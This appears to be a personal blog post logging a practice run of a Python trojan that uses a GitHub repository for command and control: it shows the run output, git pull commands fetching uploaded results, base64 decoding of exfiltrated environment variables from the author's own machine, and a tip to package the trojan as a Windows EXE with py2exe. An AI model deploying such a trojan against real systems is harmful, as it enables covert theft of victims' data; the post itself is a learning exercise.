DailyBread

Following code can be changed to EXE file format with py2exe tool for window.

http://www.py2exe.org/

Example of running the trojan code from client

python git_trojan.py
[*] get_trojan_config
[*] get_file_contents
[*] connect_to_github
[*] Found file abc.json
[*] Attempting to retrieve dirlister
[*] get_file_contents
[*] connect_to_github
[*] Found file modules/dirlister
[*] Attempting to retrieve environment
[*] get_file_contents
[*] connect_to_github
[*] Found file modules/environment
[*] module_runner
[*] In dirlister module.
[*] store_module_result
[*] connect_to_github
[*] module_runner
[*] In environment module.
[*] store_module_result
[*] connect_to_github

The client script will upload the result to git server. And it can be checked with following git commands. 

kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7$ cd data
kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7/data$ git pull origin master
remote: Counting objects: 10, done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (10/10), done.
From https://github.com/sedew810225/chapter7
 * branch            master     -> FETCH_HEAD
   c432f2c..d29f1cf  master     -> origin/master
Updating c432f2c..d29f1cf
Fast-forward
 data/abc/60121.data | 1 +
 data/abc/85593.data | 1 +
 2 files changed, 2 insertions(+)
 create mode 100644 data/abc/60121.data
 create mode 100644 data/abc/85593.data

Because the data has been encoded for base64 format, you can simply decode it as following.

kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7/data$ base64 abc/60121.data
ZXlkTVExOU9WVTFGVWtsREp6b2dKMnR2WDB0U0xsVlVSaTA0Snl3Z0oxZEpUa1JQVjBsRUp6b2dK
ek01T0RRMU9EazRKeXdnSjAxQlRrUkJWRTlTV1Y5UVFWUklKem9nSnk5MWMzSXZjMmhoY21Vdloy
TnZibVl2WjI1dmJXVXViV0Z1WkdGMGIzSjVMbkJoZEdnbkxDQW5XRVJIWDBkU1JVVlVSVkpmUkVG
VVFWOUVTVkluT2lBbkwzWmhjaTlzYVdJdmJHbG5hSFJrYlMxa1lYUmhMMnRxY0dGeWF5Y3NJQ2RI
VGs5TlJWOUVSVk5MVkU5UVgxTkZVMU5KVDA1ZlNVUW5PaUFuZEdocGN5MXBjeTFrWlhCeVpXTmhk
R1ZrSnl3Z0owZEtVMTlFUlVKVlIxOVBWVlJRVlZRbk9pQW5jM1JrWlhKeUp5d2dKMHhGVTFOUFVF
Vk9Kem9nSjN3Z0wzVnpjaTlpYVc0dmJHVnpjM0JwY0dVZ0pYTW5MQ0FuV0VSSFgxWlVUbEluT2lB
bk55Y3NJQ2RSVkY5SlRWOU5UMFJWVEVVbk9pQW5hV0oxY3ljc0lDZE1UMGRPUVUxRkp6b2dKMnRx
Y0dGeWF5Y3NJQ2RWVTBWU0p6b2dK ....

alBUQXdPek0yT2lvdWIyZG5QVEF3T3pNMk9pb3VjbUU5TURBN016WTZLaTUzWVhZOU1EQTdNelk2
S2k1aGVHRTlNREE3TXpZNktpNXZaMkU5TURBN016WTZLaTV6Y0hnOU1EQTdNelk2S2k1NGMzQm1Q
VEF3T3pNMk9pY3NJQ2RIU2xOZlJFVkNWVWRmVkU5UVNVTlRKem9nSjBwVElFVlNVazlTTzBwVElF
eFBSeWNzSUNkWVJFZGZVMFZCVkNjNklDZHpaV0YwTUNkOQ==

kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7/data$ base64 -d abc/60121.data
{'LC_NUMERIC': 'ko_KR.UTF-8', 'WINDOWID': '39845898', 'MANDATORY_PATH': '/usr/share/gconf/gnome.mandatory.path', 'XDG_GREETER_DATA_DIR': '/var/lib/lightdm-data/kjpark', 'GNOME_DESKTOP_SESSION_ID': 'this-is-deprecated', 'GJS_DEBUG_OUTPUT': 'stderr', 'LESSOPEN': '| /usr/bin/lesspipe %s', 'XDG_VTNR': '7', 'QT_IM_MODULE': 'ibus', 'LOGNAME': 'kjpark', 'USER': 'kjpark', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games', 'LC_PAPER': 'ko_KR.UTF-8', 'GNOME_KEYRING_CONTROL': '', 'GTK_IM_MODULE': 'ibus', 'DISPLAY': ':0', 'LANG': 'ko_KR.UTF-8', 'TERM': 'xterm-256color', 'SHELL': '/bin/bash', 'XDG_SESSION_PATH': '/org/freedesktop/DisplayManager/Session0', 'XAUTHORITY': '/home/kjpark/.Xauthority', 'LANGUAGE': 'ko:en_US:en', 'SESSION_MANAGER': 'local/kjpark-F9SG:@/tmp

...

ob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:', 'GJS_DEBUG_TOPICS': 'JS ERROR;JS LOG', 'XDG_SEAT': 'seat0'}kjpark@kjpar